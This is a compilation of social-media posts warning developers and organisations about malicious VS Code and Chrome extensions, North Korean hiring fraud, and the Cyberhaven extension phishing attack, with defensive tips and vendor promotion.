How to Protect Against Extension Attacks

🚨 How to Hack a Developer 🚨 Developers are constantly the targets for supply chain attacks. Attackers don’t always need to break through firewalls or social engineer credentials—sometimes, all they need is a shiny new VS Code theme or a "helpful" extension loaded with backdoors. Why does this work so well? Because developers love customization and productivity tools and the Visual Studio Marketplace does not have strict security audits. 💡 How to Protect Yourself: ✅ Don't get too enticed by new shiny things ✅ Only install extensions from verified, reputable publishers. ✅ Audit your installed extensions and remove anything unnecessary. ✅ Check for excessive permissions and obfuscated code. ✅ Use network monitoring to detect suspicious activity. I have given a talk and have a video on this topic here: "Code of Armor Presentation: Building Resilience Against Cyber Threats for Developers" https://lnkd.in/gTCu_ht3 Here are some examples: Material Theme Extensions: In February 2025, Microsoft removed two popular extensions, 'Material Theme – Free' and 'Material Theme Icons – Free,' from the Visual Studio Marketplace. These extensions, with nearly 9 million downloads, were found to contain obfuscated JavaScript code that raised security concerns https://lnkd.in/gB9Q5HVx Clipboard-Helper-Vscode: Discovered in April 2024, this extension was designed to steal clipboard data and transmit it via a Discord webhook. https://lnkd.in/gvVt7NAN Prettiest Java: Masquerading as a Java helper, this extension searched for local secrets and sent them to attackers using a Discord webhook Theme Darcula Dark: A theme extension that, instead of merely providing visual enhancements, contained code to steal personal identifiable information (PII) and send it to a remote server. https://lnkd.in/gPTH-s2g

𝗜𝗻 𝗝𝘂𝗹𝘆, 𝗮 𝗡𝗼𝗿𝘁𝗵 𝗞𝗼𝗿𝗲𝗮𝗻 𝗵𝗮𝗰𝗸𝗲𝗿 𝗽𝗼𝘀𝗲𝗱 𝗮𝘀 𝗮𝗻 𝗜𝗧 𝘄𝗼𝗿𝗸𝗲𝗿 and duped a cybersecurity company into hiring him. 𝙉𝙤𝙬 𝙩𝙝𝙚𝙮’𝙧𝙚 𝙪𝙨𝙞𝙣𝙜 𝙚𝙭𝙩𝙤𝙧𝙩𝙞𝙤𝙣 𝙖𝙨 𝙖 𝙛𝙤𝙡𝙡𝙤𝙬-𝙪𝙥 𝙖𝙩𝙩𝙖𝙘𝙠. 𝗛𝗶𝗿𝗶𝗻𝗴 𝗳𝗿𝗮𝘂𝗱 𝗷𝘂𝘀𝘁 𝗿𝗲𝗮𝗰𝗵𝗲𝗱 𝗮 𝗻𝗲𝘄 𝗹𝗲𝘃𝗲𝗹. North Korean hackers are no longer satisfied with just infiltrating your company—they’re holding your data hostage and demanding ransoms to keep it from being leaked. It’s a sophisticated evolution in cybercrime, and Western companies are the primary target. 𝗛𝗲𝗿𝗲’𝘀 𝗵𝗼𝘄 𝗶𝘁 𝘄𝗼𝗿𝗸𝘀: Hackers pose as highly qualified IT professionals, using fake resumes, AI-generated identities, and stolen credentials. They go through the hiring process unnoticed, secure a job, and gain access to sensitive company data. But instead of just stealing it, they’re now threatening to expose it—unless you pay up. 𝗦𝗼, 𝘄𝗵𝗮𝘁 𝗰𝗮𝗻 𝘆𝗼𝘂 𝗱𝗼 𝘁𝗼 𝗽𝗿𝗲𝘃𝗲𝗻𝘁 𝘁𝗵𝗶𝘀? 1. 𝗧𝗶𝗴𝗵𝘁𝗲𝗻 𝗬𝗼𝘂𝗿 𝗛𝗶𝗿𝗶𝗻𝗴 𝗣𝗿𝗼𝗰𝗲𝘀𝘀 Use multi-layered identity verification tools and require video interviews with real-time identity checks. Look for red flags like unverified recruiters or unusual interview behaviors (e.g., candidates refusing to turn on their camera). 2. 𝗦𝗰𝗿𝗲𝗲𝗻 𝗝𝗼𝗯 𝗢𝗳𝗳𝗲𝗿𝘀 𝗖𝗮𝗿𝗲𝗳𝘂𝗹𝗹𝘆 Whether you’re a hiring manager or candidate, scrutinize job application invites and offers, especially those from email or messaging services like WhatsApp. Verify the recruiter’s identity and check if the company they represent is legitimate. 3. 𝗠𝗼𝗻𝗶𝘁𝗼𝗿 𝗡𝗲𝘄 𝗛𝗶𝗿𝗲𝘀’ 𝗕𝗲𝗵𝗮𝘃𝗶𝗼𝗿 Even after onboarding, monitor new employees for suspicious activity, such as unexpected access requests or attempts to install unauthorized software. Keep access levels restricted for new hires until they’ve been fully vetted. 4. 𝗨𝘁𝗶𝗹𝗶𝘇𝗲 𝗦𝘂𝘀𝗽𝗶𝗰𝗶𝗼𝘂𝘀 𝗘𝗺𝗮𝗶𝗹 𝗔𝗻𝗮𝗹𝘆𝘀𝗶𝘀 𝗧𝗼𝗼𝗹𝘀 Before clicking on links or opening attachments in unsolicited job offers or other suspicious emails, make use of tools like Field Effect’s Suspicious Email Analysis Service (SEAS) to ensure they’re benign. The rise in this type of extortion shows just how advanced cybercriminals are becoming. Protecting your business goes beyond cybersecurity—it’s about reinforcing every layer, 𝗶𝗻𝗰𝗹𝘂𝗱𝗶𝗻𝗴 𝘆𝗼𝘂𝗿 𝗵𝗶𝗿𝗶𝗻𝗴 𝗽𝗿𝗼𝗰𝗲𝘀𝘀. 𝗧𝗮𝗸𝗲𝗮𝘄𝗮𝘆: The next IT hire you make could be a undercover cybercriminal, but you can minimize the risk by staying vigilant, verifying identities, and implementing strict access controls. Intelligent Technical Solutions Mike Rhea #Cybersecurity #HiringFraud #DataExtortion #HRSecurity #RiskManagement #BusinessProtection #EndpointSecurity #ITSecurity #RemoteWork #Leadership #CyberRisk #RiskMitigation #BusinessLeaders #HR

Browser Extensions: A Security Blind Spot The recent security breach involving more than 35 Chrome extensions, impacting 2.6 million users, serves as a great illustration of the escalating cyberthreat. Cybercriminals exploited phishing techniques to infiltrate trusted extensions, compromising user credentials and extracting sensitive data. Domain registrations linked to the attack date back to August 2022 and July 2021, implying a well-planned, long-term operation. While the magnitude of this breach is alarming, the real issue lies in the neglect of browser extensions by most Chief Information Security Officers (CISOs), except in the most secure institutions. Browser extensions are easily installed by the user without administrator rights, they can have extensive access to sensitive data, and they frequently evade detection by most enterprise security measures. This incident underscores a critical gap that cybersecurity leaders shouldn't ignore. Here are some steps to address this challenge: - Regular Auditing and inventory: Establish oversight on the extensions installed across organizational endpoints. - Permission Management: Assess and restrict the permissions granted to extensions, where possible. - Promote Security Awareness: Educate employees on the dangers of installing unverified extensions. - Enforce Policies: Consider deploying enterprise security controls to permit only approved browser extensions. In an increasingly intricate digital realm, CISOs must broaden their threat assessments to encompass all potential vulnerabilities, including items as seemingly trivial as browser extensions. The focus should not only be on what is monitored but also on what remains undetected. In other words: do you know where your blind spots are? Read more at: https://lnkd.in/em4BhDFX

Think twice before you click 'Add Extension'. Your quest for convenience could compromise your security. But the truth is...many extensions are wolves in sheep's clothing. Hackers and scammers create fake extensions packed with malware and hidden tracking software. Once installed, these malicious add-ons can spy on everything you do online, steal personal information like passwords, or even take control of your whole computer. Just as you seek products directly from genuine manufacturers, you should only download browser add-ons from reputable app stores. Here are a few things to keep in mind before opting for any extension or tool online: 1. Check out the developer’s website to see if it’s a legitimate extension and not a one-off by an unvetted source. 2. Read the description and look for things that may be questionable, like tracking info or data sharing. 3. Check out the reviews. Look for users complaining of oddities happening, speculating on their data being taken, or for anything that strikes you as odd. 4. Be cautious. The more extensions installed, the bigger the attack surface you open to attackers. Only pick the most useful and delete the ones you don't need. 5. If an extension installed suddenly requests new permissions, be wary. If you can’t find a reason for the permission change, it’s probably better to uninstall. Before adding that new extension, pause and verify. Your privacy is priceless. So choose wisely, stay secure.

The Cyberhaven attack is making headlines—but what could Cyberhaven and its customers have done to prevent it? Attack Context: https://lnkd.in/gqZCCDYh What Happeend? SquareX reported a large-scale attack targeting Chrome extensions. This is how it worked: - The Chrome Web Store publicly displays the developer’s email address on the extension’s page. - Attackers used that email to impersonate the Chrome Web Store and request urgent action. - By clicking the link in the email, the attackers attempted to gain permission to the developer’s Chrome Extension account. - The developer may have granted access, enabling the attacker to modify and push a malicious update to the extension. Here is video of the acttal attack we uncovered: https://lnkd.in/gHcqJasK What could have been done to stop this attack? (A) By Cyberhaven: (i) Restricting Risky OAuth Permissions Employees often click through SSO and OAuth screens, potentially granting permissions to unknown third-party apps. On the server side, this could be prevented by disallowing apps that request risky OAuth scopes unless they are authorized. While creating a whitelist isn’t always practical and can reduce productivity, a client-side Browser Detection-Response tool can step in. In the same post linked above, we detail how SquareX could have helped Cyberhaven and other organizations. (ii) Cyberhaven’s browser extension is primarily deployed in enterprise settings, so there is no strong need to host it on the Google Chrome Web Store. Many security extensions (like Cyberhaven) can be deployed via GPO/MDM, hosted on private URLs/stores. This approach removes the risk of a mass compromise like the one seen in this attack. (B) By Enterprises using Browser Extensions (i) Supply Chain Attack Awareness Browser extensions installed from the public Chrome Web Store are vulnerable to supply chain attacks. An extension may be malicious from the start, acquired by a malicious party later, or hijacked. To mitigate these risks, organizations need the ability to detect and block suspicious extensions—either at deployment time or dynamically whenever the extension starts exhibiting malicious behavior. SquareX has extensively researched how extensions can be exploited, including a cutting-edge talk at Defcon and identifying architectural issues in the new MV3 extension framework: Defcon talk: https://lnkd.in/gdKWmayt Darkreading coverage: https://lnkd.in/gt7-S29v Our detection capabilities: https://lnkd.in/gqMTe_tb If you want to learn more about protecting your enterprise, feel free to DM me or try us at www.sqrx.com SquareX - an industry-first Browser Detection-Response solution.